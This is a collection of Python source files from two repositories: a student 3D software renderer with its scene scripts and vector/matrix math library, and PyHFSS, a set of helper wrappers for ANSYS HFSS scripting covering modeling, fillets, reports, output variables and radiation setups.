        if 0<=tx<1 and 0<=ty<1:
            x = int(tx * self.width)
            y = int(ty * self.height)
            return self.pixels[y][x]
        else:
            return _color(0,0,0)
49,711 | campeon19/Engine3D_Graficas | refs/heads/main | /Engine3D.py | # Programa principal
# Christian Daniel Perez De Leon 19710
from gl import Renderer, V2, V3, _color
from obj import Texture
from shaders import *
# Output image dimensions in pixels.
width = 940
height = 540
rend = Renderer(width, height)
# rend.background = Texture('Fondos/fondo.bmp')
# rend.glClearBackground()
# rend.active_shader = shader1
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(-3,1.3,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = toon
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(0,1.3,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = shader2
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(3,1.3,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = shader3
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(-3,-1.2,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = glow
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(0,-1.2,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = shader4
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(3,-1.2,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# Render the test model with the scanline-transparency shader and write
# the result; the commented sections below are earlier experiments kept
# for reference (camera placement, phong/laptop scene).
rend.active_shader = transparencia
rend.active_texture = Texture('Modelos/model.bmp')
modelPosition = V3(0,0,-5)
rend.glLoadModel('Modelos/model.obj',
                 modelPosition,
                 V3(2.5,2.5,2.5),
                 V3(0,0,0))
# rend.glLookAt(modelPosition, V3(0,4,2))
# rend.active_shader = phong
# # rend.active_texture = Texture('Modelos/New_Albedo.bmp')
# rend.active_texture = Texture('Modelos/New_AmbientOcclusion.bmp')
# modelPosition = V3(0,0,-4)
# # rend.directional_light = V3(0,0,0)
# rend.glLookAt(modelPosition, V3(0,5,0))
# rend.glLoadModel('Modelos/laptop.obj', modelPosition, V3(7,7,7), V3(20,35,0))
rend.glFinish("Resultados/Pruebas2.bmp")
49,712 | campeon19/Engine3D_Graficas | refs/heads/main | /matematica.py | # Christian Daniel Perez De Leon 19710
# Libreria de matematica propia
import sys
pi = 3.14159265359
def restaVect(vec1, vec2):
    """Component-wise subtraction vec1 - vec2; returns a new list."""
    return [vec1[i] - vec2[i] for i in range(len(vec1))]
def productoPunto(vec1, vec2):
    """Dot product of two equal-length vectors."""
    return sum(vec1[i] * vec2[i] for i in range(len(vec1)))
def productoCruz3D(vec1, vec2):
    """3D cross product vec1 x vec2; returns a 3-element list."""
    a1, a2, a3 = vec1[0], vec1[1], vec1[2]
    b1, b2, b3 = vec2[0], vec2[1], vec2[2]
    return [a2 * b3 - a3 * b2,
            a3 * b1 - a1 * b3,
            a1 * b2 - a2 * b1]
def normalizar3D(vector):
    """Return *vector* scaled to unit length (3 components)."""
    # Inlined square root (same computation as raizCuadrada: x ** 0.5).
    magnitud = (vector[0] * vector[0] + vector[1] * vector[1] + vector[2] * vector[2]) ** 0.5
    return [vector[0] / magnitud,
            vector[1] / magnitud,
            vector[2] / magnitud]
def raizCuadrada(valor):
    """Square root via exponentiation (keeps the library math-module free)."""
    return valor ** 0.5
def gradosARadianes(val):
    """Convert degrees to radians using the module-level pi constant."""
    return val * pi / 180
def multMatrices3x3(matriz1, matriz2):
    """Matrix product matriz1 * matriz2 as nested lists.

    Generalized: the result is sized from the inputs (rows of matriz1 x
    columns of matriz2) instead of a hard-coded 3x3 zero matrix, so any
    compatible shapes work; 3x3 behavior is unchanged.
    """
    resultado = [[0 for _ in range(len(matriz2[0]))] for _ in range(len(matriz1))]
    for i in range(len(matriz1)):
        for j in range(len(matriz2[0])):
            for k in range(len(matriz2)):
                resultado[i][j] += matriz1[i][k] * matriz2[k][j]
    return resultado
def multMatrices4x4(matriz1, matriz2):
    """Matrix product matriz1 * matriz2 as nested lists.

    Generalized: the result is sized from the inputs (rows of matriz1 x
    columns of matriz2) instead of a hard-coded 4x4 zero matrix, so any
    compatible shapes work; 4x4 behavior is unchanged.
    """
    resultado = [[0 for _ in range(len(matriz2[0]))] for _ in range(len(matriz1))]
    for i in range(len(matriz1)):
        for j in range(len(matriz2[0])):
            for k in range(len(matriz2)):
                resultado[i][j] += matriz1[i][k] * matriz2[k][j]
    return resultado
def multMatrices4xVec(matriz, vector):
    """Multiply a matrix by a column vector; returns the list of row dot
    products."""
    resultado = []
    for fila in matriz:
        acumulado = 0
        for componente_fila, componente_vec in zip(fila, vector):
            acumulado += componente_fila * componente_vec
        resultado.append(acumulado)
    return resultado
def matrizInv(matriz):
    """Invert a square matrix via Gauss-Jordan elimination.

    Fix: the input is no longer modified.  The original implementation
    aliased the argument (`m = matriz`), appended the identity columns to
    the caller's rows, and row-reduced them in place — corrupting the
    caller's matrix (e.g. Renderer.camMatrix was destroyed by glViewMatrix,
    so shaders reading render.camMatrix saw a reduced matrix).

    No pivoting is performed: a zero on the diagonal aborts via sys.exit,
    matching the original behavior.
    """
    n = len(matriz)
    # Work on a deep copy so the caller's matrix survives.
    m = [list(fila) for fila in matriz]
    # Augment with the identity matrix: [M | I]
    for i in range(n):
        for j in range(n):
            if i == j:
                m[i].append(1)
            else:
                m[i].append(0)
    # Gauss-Jordan elimination
    for i in range(n):
        if m[i][i] == 0.0:
            sys.exit('Division por cero')
        for j in range(n):
            if i != j:
                ratio = m[j][i]/m[i][i]
                for k in range(2*n):
                    m[j][k] = m[j][k] - ratio * m[i][k]
    # Scale each row so the main diagonal becomes 1
    for i in range(n):
        divisor = m[i][i]
        for j in range(2*n):
            m[i][j] = m[i][j]/divisor
    # The right half of the augmented matrix is the inverse
    return [fila[n:] for fila in m]
def valAbsoluto(valor):
    """Absolute value of *valor*."""
    return -valor if valor < 0 else valor
def scalarxMatrix(scalar, matrix):
    """Return *matrix* scaled element-wise by *scalar*.

    Fix: returns a new matrix.  The original aliased the argument
    (`m = matrix`) and scaled the caller's matrix in place while also
    returning it — a surprising side effect for a function named like a
    pure product.
    """
    return [[elemento * scalar for elemento in fila] for fila in matrix]
def scalarxVector(scalar, vector):
    """Return *vector* scaled element-wise by *scalar*.

    Fix: returns a new list.  The original aliased the argument
    (`m = vector`) and scaled the caller's list in place while also
    returning it.
    """
    return [componente * scalar for componente in vector]
| {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,713 | campeon19/Engine3D_Graficas | refs/heads/main | /Proyecto1.py | # Programa principal
# Christian Daniel Perez De Leon 19710
from gl import Renderer, V2, V3, _color
from obj import Texture
from shaders import *
# Full-HD scene: a Mario-themed lineup, each model rendered with its own
# shader, composited over a background texture.
width = 1920
height = 1080
rend = Renderer(width, height)
rend.background = Texture('Proyecto 1/Modelos/Background/opcion2.bmp')
rend.glClearBackground()
# --------------------------------------------------------------------------
# Boo — see-through scanline shader (texture intentionally disabled).
rend.active_shader = transparencia
# rend.active_texture = Texture('Proyecto 1/Modelos/Boo/Boo_tex.bmp')
modelPosition = V3(-4,-2,-5)
rend.glLoadModel('Proyecto 1/Modelos/Boo/Boo.obj',
                 modelPosition,
                 V3(0.003,0.003,0.003),
                 V3(0,160,0))
# --------------------------------------------------------------------------
# Toad — flat shading with its texture.
rend.active_shader = flat
rend.active_texture = Texture('Proyecto 1/Modelos/Toad/Toad_tex.bmp')
modelPosition = V3(-4.5,-2.6,-8)
rend.glLoadModel('Proyecto 1/Modelos/Toad/Toad.obj',
                 modelPosition,
                 V3(0.008,0.008,0.008),
                 V3(0,180,0))
# --------------------------------------------------------------------------
# Luigi — phong shading.
rend.active_shader = phong
rend.active_texture = Texture('Proyecto 1/Modelos/luigiD.bmp')
modelPosition = V3(0,-2.5,-5)
rend.glLoadModel('Proyecto 1/Modelos/luigi.obj',
                 modelPosition,
                 V3(0.01,0.01,0.01),
                 V3(0,120,0))
# --------------------------------------------------------------------------
# Mario — phong shading.
rend.active_shader = phong
rend.active_texture = Texture('Proyecto 1/Modelos/marioD.bmp')
modelPosition = V3(-2,-2.3,-5)
rend.glLoadModel('Proyecto 1/Modelos/mario.obj',
                 modelPosition,
                 V3(0.01,0.01,0.01),
                 V3(0,-180,0))
# --------------------------------------------------------------------------
# Bullet Bill — flat shading, tilted in flight.
rend.active_shader = flat
rend.active_texture = Texture('Proyecto 1/Modelos/Bullet_Bill/Bullet_Bill_tex.bmp')
modelPosition = V3(-2,0,-8)
rend.glLoadModel('Proyecto 1/Modelos/Bullet_Bill/Bullet_Bill.obj',
                 modelPosition,
                 V3(0.001,0.001,0.001),
                 V3(0,50,20))
# --------------------------------------------------------------------------
# 1-Up mushroom — toon shading.
rend.active_shader = toon
rend.active_texture = Texture('Proyecto 1/Modelos/Extra Life/Extra_Life_tex.bmp')
modelPosition = V3(2.5,-2.5,-7)
rend.glLoadModel('Proyecto 1/Modelos/Extra Life/Extra_Life.obj',
                 modelPosition,
                 V3(0.015,0.015,0.015),
                 V3(0,150,0))
# --------------------------------------------------------------------------
# Koopa — phong shading.
rend.active_shader = phong
rend.active_texture = Texture('Proyecto 1/Modelos/Koopa2/textures/Koopa_tex.bmp')
modelPosition = V3(3.7,-2,-6)
rend.glLoadModel('Proyecto 1/Modelos/Koopa2/source/Koopa.obj',
                 modelPosition,
                 V3(0.06,0.06,0.06),
                 V3(0,90,0))
# --------------------------------------------------------------------------
# Star — untextured glow shader over a golden base color.
rend.active_shader = glow
rend.active_texture = None
rend.curr_color = _color(215/255, 151/255, 10/255)
modelPosition = V3(1.5,0.5,-6)
rend.glLoadModel('Proyecto 1/Modelos/Star/Star.obj',
                 modelPosition,
                 V3(0.0025,0.0025,0.0025),
                 V3(0,-40,0))
# --------------------------------------------------------------------------
# Moon — bump texture plus a normal map.
rend.active_shader = normalMap
rend.active_texture = Texture('Proyecto 1/Modelos/Moon/Textures/Bump_2K.bmp')
rend.normal_map = Texture('Proyecto 1/Modelos/Moon/Textures/normal_map.bmp')
rend.curr_color = _color(1,1,1)
modelPosition = V3(-3.7,2,-6)
rend.glLoadModel('Proyecto 1/Modelos/Moon/Moon_2K.obj',
                 modelPosition,
                 V3(0.55,0.55,0.55),
                 V3(0,90,0))
rend.glFinish("Proyecto 1/Resultado/Proyecto1.bmp")
| {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,732 | judealnas/PyHFSS | refs/heads/master | /hfss3DModeler/hfssModeler.py | from hfss3DModeler import _getModeler
def GetObjName(o3DMod, obj_idx):
    """
    Look up an object's name by its creation-order index.

    :param o3DMod: oDesign.SetActiveEditor("3D Modeler")
    :param obj_idx: Object index (i.e. order of creation, 0-based)
    :return: Object name (string)
    """
    return o3DMod.GetObjectName(obj_idx)
def GetNumObjects(o3DMod):
    """
    Count the objects in the active design.

    :param o3DMod: oDesign.SetActiveEditor("3D Modeler")
    :return: Number of objects in the design
    """
    return o3DMod.GetNumObjects()
def GetAllObjNames(o3DMod):
    """
    :param o3DMod: oDesign.SetActiveEditor("3D Modeler")
    :return: List of names of all objects in target design
    """
    nombres = []
    for idx in range(o3DMod.GetNumObjects()):
        nombres.append(o3DMod.GetObjectName(idx))
    return nombres
def Delete(o3DMod, objects):
    """
    Delete objects from the active design.

    :param o3DMod: oDesign.SetActiveEditor("3D Modeler")
    :param objects: Comma-separated string of object names, or any
        non-string sequence of names (list, tuple, ...)
    :return: None
    """
    # Generalized: the original only special-cased `list`, so a tuple of
    # names fell through and was passed to HFSS unjoined.  Join any
    # non-string iterable instead.
    if isinstance(objects, str):
        obj_str = objects
    else:
        obj_str = ",".join(objects)
    o3DMod.Delete(
        [
            "NAME:Selections",
            "Selections:=", obj_str
        ]
    )
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,733 | judealnas/PyHFSS | refs/heads/master | /hfss3DModeler/hfssFillet.py | from hfss3DModeler import _getModeler
def _filletParamListElmt(radius, setback, edges, vertices):
return [
"NAME:FilletParameters",
"Edges:=", edges,
"Vertices:=", vertices,
"Radius:=", "{}mm".format(radius),
"Setback:=", "{}mm".format(setback)
]
def _fillet(oEditor, selections, radius, setback=0, edges=[], vertices=[]):
    """
    :param oDesign: target HFSS design,
    :param selections: list of IDs (e.g. object names)
    :param radius: fillet radius
    :param setback: setback distance; applicable in 3D only
    :param edges: A 2D list of edge ID sets; each element of <ids> is another
    list containing edge IDs belonging to corresponding entity in <selections>;
    For 2D fillets, <edges> must be empty list and <vertices> populated
    For 3D fillets, <vertices> must be empty list and <edges> populated
    :param vertices:A 2D list of vertex ID sets; each element of <ids> is another
    list containing vertex IDs belonging to corresponding entity in <selections>;
    For 2D fillets, <edges> must be empty list and <vertices> populated
    For 3D fillets, <vertices> must be empty list and <edges> populated
    :return: None

    NOTE(review): the mutable-default lists are shared across calls (they
    are never mutated here, so it is harmless today) — confirm before
    adding in-place modifications.
    NOTE(review): if BOTH edges and vertices are non-empty, neither branch
    below runs and an empty parameter list is sent to HFSS — confirm this
    is an intended "do nothing" case.
    """
    one_elmt_flag = not isinstance(selections, list)
    # if single object selection, wrap in list
    if one_elmt_flag:
        selections = [selections]
    # wrap vertex/edge lists
    if len(vertices) != 0:
        vertices = [vertices]
    if len(edges) != 0:
        edges = [edges]
    fillet_selection = [
        "NAME:Selections",
        "Selections:=", ",".join(selections),
        "NewPartsModelFlag:=", "Model"
    ]
    fillet_params = []
    # 2D case: one parameter element per vertex set.
    if len(edges) == 0:
        fillet_params = [
            _filletParamListElmt(radius=radius, setback=setback,edges=[],vertices=vtx_set)
            for vtx_set in vertices
        ]
    # 3D case: one parameter element per edge set.
    elif len(vertices) == 0:
        fillet_params = [
            _filletParamListElmt(radius=radius, setback=setback, edges=edge_set, vertices=[])
            for edge_set in edges
        ]
    fillet_params.insert(0, "NAME:Parameters")
    oEditor.Fillet(
        fillet_selection,
        fillet_params
    )
def hfss2DFillet(oEditor, selections, vtx_ids, radius):
    """
    Apply a 2D fillet (vertex-based, no setback) via _fillet.

    :param oEditor: oDesign.SetActiveEditor("3D Modeler")
    :param selections: List of face ids
    :param vtx_ids: 2D list where nested lists are vertex IDs
    belonging to corresponding face entity in <selections>
    :param radius: Fillet radius in mm
    :return: None
    """
    _fillet(oEditor, selections=selections, vertices=vtx_ids, radius=radius)
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,734 | judealnas/PyHFSS | refs/heads/master | /hfssReporter.py | def _getReporter(oDesign):
return oDesign.GetModule("ReportSetup")
def AddCartesianLimitLine(oDesign, report_name, x_vals, x_unit_str, y_vals, y_units_str, y_axis_name):
    """
    Adds a limit line to a report on the X axis.
    :param oDesign: Target HFSS Design
    :param report_name: Target Report name
    :param x_vals: List of x values (numeric)
    :param x_unit_str: X axis units (string)
    :param y_vals: List of y values (numeric)
    :param y_units_str: Y axis units (string)
    :param y_axis_name: Name of associated Y axis (string)
    :return: None
    """
    oReporter = _getReporter(oDesign)
    # Fix: list.insert() mutates in place and returns None, so the original
    # code passed None (twice) inside the argument structure instead of the
    # headed value lists.  Build new "NAME:..."-headed lists instead, which
    # also leaves the caller's lists untouched.
    # Fix: the units key was misspelled "YUnis:=".
    oReporter.AddCartesianLimitLine(report_name,
                                    [
                                        "NAME:CartesianLimitLine",
                                        ["NAME:XValues"] + list(x_vals),
                                        "XUnits:=", x_unit_str,
                                        ["NAME:YValues"] + list(y_vals),
                                        "YUnits:=", y_units_str,
                                        "YAxis:=", y_axis_name
                                    ])
def GetAllReportNames(oDesign):
    """
    List every report defined in the design's Results branch.

    :param oDesign: Target HFSS design
    :return: List of all report names in design
    """
    oReporter = _getReporter(oDesign)
    return oReporter.GetAllReportNames()
def CreateReport(oDesign, report_name, report_type, dispay_type, soln_name, cntxt_arr, family_arr,
                 x_component, y_component, z_component=None):
    """
    Creates a new report with a single trace and adds it to the Results branch
    in the project tree.
    :param oDesign: Target HFSS design
    :param report_name: New Report name
    :param report_type: Type of new report (e.g. "Modal Solution Data" or "Far Fields")
    :param dispay_type: Display type (e.g. "Rectangular Plot" or "Data Table")
    :param soln_name: Solution name
    :param cntxt_arr: Context array (specifies geometry and/or domain)
    :param family_arr: Family array (selects variations)
    :param x_component: X domain quantity, e.g. "Freq" to plot against frequency
    :param y_component: List of Y domain quantities
    :param z_component: List of Z domain quantities (optional)
    :return: None
    """
    oReporter = _getReporter(oDesign)
    report_data = [
        "X Component:=", x_component,
        "Y Component:=", y_component
    ]
    # A Z axis is only meaningful for 3D display types; append when given.
    if z_component is not None:
        report_data += ["Z Component:=", z_component]
    oReporter.CreateReport(report_name, report_type, dispay_type, soln_name, cntxt_arr, family_arr,
                           report_data)
def ExportToFile(oDesign, report_name, file_path):
    """
    From a data table or plot, generates text format, comma delimited, tab delimited, .dat, or .rdat type
    output files.
    :param oDesign: Target HFSS Design
    :param report_name: Target report
    :param file_path: Absolute path and filename. Supports extensions .txt, .csv, .tab, .dat, or .rdat
    (the extension selects the output format)
    :return: None
    """
    oReporter = _getReporter(oDesign)
    oReporter.ExportToFile(report_name, file_path)
def UpdateReport(oDesign, report_name):
    """
    Updates the specified report in the Results branch in the project tree.
    :param oDesign: Target HFSS design
    :param report_name: Report to update
    :return: None
    """
    oReporter = _getReporter(oDesign)
    oReporter.UpdateReport(report_name)
def UpdateAllReports(oDesign):
    """
    Updates all reports in the Results branch in the project tree.
    :param oDesign: Target HFSS design
    :return: None
    """
    oReporter = _getReporter(oDesign)
    oReporter.UpdateAllReports()
49,735 | judealnas/PyHFSS | refs/heads/master | /hfss3DModeler/hfssGetVertexIDs.py | from hfss3DModeler import _getModeler
def GetVertexIDsFromObject(o3DMod, obj_id):
    """
    :param o3DMod: oDesign.SetActiveEditor("3D Modeler")
    :param obj_id: target object ID (i.e. name)
    :return: list of integer vertex IDs belonging to the object
    """
    return _getVtxIDs(o3DMod, obj_id, "object")
def GetVertexIDsFromFace(o3DMod, face_id):
    """
    :param o3DMod: oDesign.SetActiveEditor("3D Modeler")
    :param face_id: target face ID (int or int string)
    :return: list of integer vertex IDs on the face
    """
    # Fix: was dispatching with mode "object" (copy-paste from the object
    # variant), which treated the face ID as an object name.
    return _getVtxIDs(o3DMod, face_id, "face")
def GetVertexIDsFromEdge(o3DMod, edge_id):
    """
    :param o3DMod: oDesign.SetActiveEditor("3D Modeler")
    :param edge_id: target edge ID (int or int string)
    :return: list of integer vertex IDs on the edge
    """
    # Fix: was dispatching with mode "object" (copy-paste from the object
    # variant), which treated the edge ID as an object name.
    return _getVtxIDs(o3DMod, edge_id, "edge")
def _getVtxIDs(oEditor, id, mode):
vtx_ids = []
if mode.lower() == "face":
vtx_ids = oEditor.GetVertexIDsFromFace(id)
elif mode.lower() == "edge":
vtx_ids = oEditor.GetVertexIDsFromedge(id)
elif mode.lower() == "object":
vtx_ids = oEditor.GetVertexIDsFromObject(id)
vtx_ids = list(map(int, vtx_ids)) # convert string num to int
return vtx_ids
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,736 | judealnas/PyHFSS | refs/heads/master | /hfssOutputVars.py | def _getOutVarModule(oDesign):
    """Return the design's "OutputVariable" script module."""
    return oDesign.GetModule("OutputVariable")
def GetOutputVariableValue(oVars, name, variation, soln, report_type, context=[]):
    """
    Evaluate a named output variable at one variation.
    :param oVars: oDesign.GetModule("OutputVariable")
    :param name: output variable name
    :param variation: variation string, e.g. "Freq='1GHz'", "Theta='25deg'"
    :param soln: solution name, e.g. "Setup1 : Sweep"
    :param report_type: data type, e.g. "Modal Solution Data"
    :param context: [] or ["Context:=", <far-field setup or geometry>]
    :return: numeric value of the output variable
    """
    return oVars.GetOutputVariableValue(name, variation, soln, report_type, context)
def CreateOutputVar(oVars, name, expression, soln_name, report_type, cntxt=[]):
    """
    Define a new output variable on the design.
    :param oVars: oDesign.GetModule("OutputVariable")
    :param name: name of the new output variable
    :param expression: expression the variable evaluates
    :param soln_name: solution name, e.g. "Setup1 : Sweep"
    :param report_type: data type, e.g. "Modal Solution Data"
    :param cntxt: [] or ["Context:=", <far-field setup or geometry>]
    :return: None
    """
    oVars.CreateOutputVariable(name, expression, soln_name, report_type, cntxt)
def DeleteOutputVar(oVars, name):
    """
    Remove the named output variable from the design.
    :param oVars: oDesign.GetModule("OutputVariable")
    :param name: output variable to delete
    :return: None
    """
    oVars.DeleteOutputVariable(name)
def DoesOutVarExist(oVars, name):
    """
    Report whether an output variable called *name* exists.
    :param oVars: oDesign.GetModule("OutputVariable")
    :param name: output variable name to look up
    :return: truth value from HFSS
    """
    return oVars.DoesOutputVariableExist(name)
if __name__ == "__main__":
    # Ad-hoc smoke test; must run inside ANSYS Electronics Desktop, which
    # injects the global ``oDesktop`` once ScriptEnv is initialized.
    import sys
    sys.path.append("C:\\Program Files\\AnsysEM\\AnsysEM20.2\\Win64")
    sys.path.append("C:\\Program Files\\AnsysEM\\AnsysEM20.2\\Win64\\PythonFiles\\DesktopPlugin")
    import ScriptEnv
    ScriptEnv.Initialize("Ansoft.ElectronicsDesktop")
    oProject = oDesktop.GetActiveProject()
    oDesign = oProject.GetActiveDesign()
    # NOTE(review): GetOutputVariableValue documents its first parameter as
    # oDesign.GetModule("OutputVariable"), but oDesign itself is passed
    # here — confirm whether this call ever worked.
    val = GetOutputVariableValue(oDesign, "bandwidth", "Domain='Sweep'", "Setup1 : Sweep", "Modal Solution Data", [])
    oDesktop.AddMessage(oProject.GetName(), oDesign.GetName(), 0, str(val), "")
    ScriptEnv.Shutdown() | {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,737 | judealnas/PyHFSS | refs/heads/master | /hfssDesign.py | def ValidateDesign(oDesign, filepath, b_clr_filepath):
    """Run HFSS design validation.
    :param oDesign: target HFSS design
    :param filepath: log file path for the validation report
    :param b_clr_filepath: presumably True clears the file first — TODO confirm
    :return: result code from HFSS
    """
    return oDesign.ValidateDesign(filepath, b_clr_filepath)
def Analyze(oDesign, setup_name):
    """Solve the named analysis setup (blocks until done).
    :param oDesign: target HFSS design
    :param setup_name: analysis setup to run, e.g. "Setup1"
    :return: result code from HFSS
    """
    return oDesign.Analyze(setup_name) | {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,738 | judealnas/PyHFSS | refs/heads/master | /hfss3DModeler/__init__.py | def _getModeler(oDesign):
    """Return the design's "3D Modeler" editor object."""
    return oDesign.SetActiveEditor("3D Modeler")
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,739 | judealnas/PyHFSS | refs/heads/master | /hfssAnalysisSetup.py | def _getAnalysisModule(oDesign):
    """Return the design's "AnalysisSetup" script module."""
    return oDesign.GetModule("AnalysisSetup")
def GetSetups(oAnalysis):
    """Return the names of all analysis setups in the design.
    :param oAnalysis: oDesign.GetModule("AnalysisSetup")
    """
    return oAnalysis.GetSetups()
def GetSetupCount(oAnalysis):
    """Return the number of analysis setups in the design.
    :param oAnalysis: oDesign.GetModule("AnalysisSetup")
    """
    return oAnalysis.GetSetupCount()
def GetSweeps(oAnalysis):
    """Return the names of all frequency sweeps in the design.
    :param oAnalysis: oDesign.GetModule("AnalysisSetup")
    """
    return oAnalysis.GetSweeps()
def GetSweepCount(oAnalysis):
    """Return the number of frequency sweeps in the design.
    :param oAnalysis: oDesign.GetModule("AnalysisSetup")
    """
    cnt = oAnalysis.GetSweepCount()
    return cnt | {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,740 | judealnas/PyHFSS | refs/heads/master | /hfssRadiation.py | def _getRadFieldModule(oDesign):
    """Return the design's "RadField" (radiation fields) script module."""
    return oDesign.GetModule("RadField")
def InsertFarFieldSphereSetup(oRad, name="Infinite Sphere1",
                              theta_dict=None,
                              phi_dict=None,
                              coord_sys="Global", face_list_name=""):
    """
    Create a far-field infinite-sphere radiation setup.
    :param oRad: oDesign.GetModule("RadField")
    :param name: Name of the new setup; the default auto-increments past
                 any existing "Infinite SphereN" setups
    :param theta_dict: {"start", "stop", "step"} angles in degrees
                       (default 0..180 step 2)
    :param phi_dict: {"start", "stop", "step"} angles in degrees
                     (default -180..180 step 2)
    :param coord_sys: Name of reference coordinate system
    :param face_list_name: Face-list name (configured in HFSS) for a custom
                           radiation surface; "" disables it
    :return: Name of the setup actually created
    """
    # Fix: the angle dicts were mutable default arguments (one shared dict
    # per process); use None sentinels and build fresh defaults per call.
    if theta_dict is None:
        theta_dict = {"start": 0, "stop": 180, "step": 2}
    if phi_dict is None:
        phi_dict = {"start": -180, "stop": 180, "step": 2}
    bool_local_cs = not(coord_sys == "Global")
    bool_custom_rad = face_list_name != ""
    # If using default name, check for pre-existing setups
    if name == "Infinite Sphere1":
        existing_setups = oRad.GetSetupNames("Infinite Sphere")
        i = 2
        while name in existing_setups:
            name = "Infinite Sphere{}".format(i)
            i = i + 1
    # Create new far field infinite sphere setup
    oRad.InsertFarFieldSphereSetup([
        "NAME:" + name,
        "UseCustomRadiationSurface:=", bool_custom_rad,
        "CustomRadiationSurface:=", face_list_name,
        "ThetaStart:=", "{}deg".format(theta_dict["start"]),
        "ThetaStop:=", "{}deg".format(theta_dict["stop"]),
        "ThetaStep:=", "{}deg".format(theta_dict["step"]),
        "PhiStart:=", "{}deg".format(phi_dict["start"]),
        "PhiStop:=", "{}deg".format(phi_dict["stop"]),
        "PhiStep:=", "{}deg".format(phi_dict["step"]),
        "UseLocalCS:=", bool_local_cs,
        "CoordSystem:=", coord_sys
    ])
    return name
def DeleteFarFieldSetup(oRad, setups):
    """
    Delete the listed far-field radiation setups, then release the module.
    :param oRad: oDesign.GetModule("RadField")
    :param setups: list of far-field setup names to delete
    :return: None
    """
    oRad.DeleteFarFieldSetup(setups)
    oRad.release()
def DeleteNearFieldSetup(oRad, setups):
    """
    Delete the listed near-field radiation setups, then release the module.
    :param oRad: oDesign.GetModule("RadField")
    :param setups: list of near-field setup names to delete
    :return: None
    """
    oRad.DeleteNearFieldSetup(setups)
    oRad.release()
def DeleteFieldSetup(oRad, setups):
    """
    Delete radiation setups by name, near and far field alike.
    :param oRad: oDesign.GetModule("RadField")
    :param setups: list of setup names to delete (near and far field)
    :return: None
    """
    far = set(oRad.GetSetupNames("Infinite Sphere"))  # far-field setups
    near = set()                                      # near-field setups
    for geometry in ("Sphere", "Box", "Line", "Rectangle"):
        near.update(oRad.GetSetupNames(geometry))
    # Intersect with the requested names so each delete call only gets
    # setups of the matching kind (duplicates collapse in the sets).
    wanted = set(setups)
    oRad.DeleteFarFieldSetup(list(wanted & far))
    oRad.DeleteNearFieldSetup(list(wanted & near))
    oRad.release()
def GetSetupNames(oRad, geometry_str):
    """
    List radiation setups whose geometry matches *geometry_str*.
    :param oRad: oDesign.GetModule("RadField")
    :param geometry_str: One of "Infinite Sphere", "Sphere", "Line",
                         "Rectangle", or "Box"
    :return: list of matching setup names
    """
    setup_names = oRad.GetSetupNames(geometry_str)
    oRad.release()
    return setup_names
if __name__ == "__main__":
    # Smoke test; must run inside ANSYS Electronics Desktop, which injects
    # the global ``oDesktop`` once ScriptEnv is initialized.
    import ScriptEnv
    ScriptEnv.Initialize("Ansoft.ElectronicsDesktop")
    oProject = oDesktop.GetActiveProject()
    oDesign = oProject.GetActiveDesign()
    # Fix: these helpers document their first parameter as
    # oDesign.GetModule("RadField"), not the design object itself.
    oRad = _getRadFieldModule(oDesign)
    InsertFarFieldSphereSetup(oRad, name="TestSetup")
    DeleteFieldSetup(oRad, ["TestSetup", "Box1"])
    # Fix: Shutdown was referenced without parentheses, so it never ran.
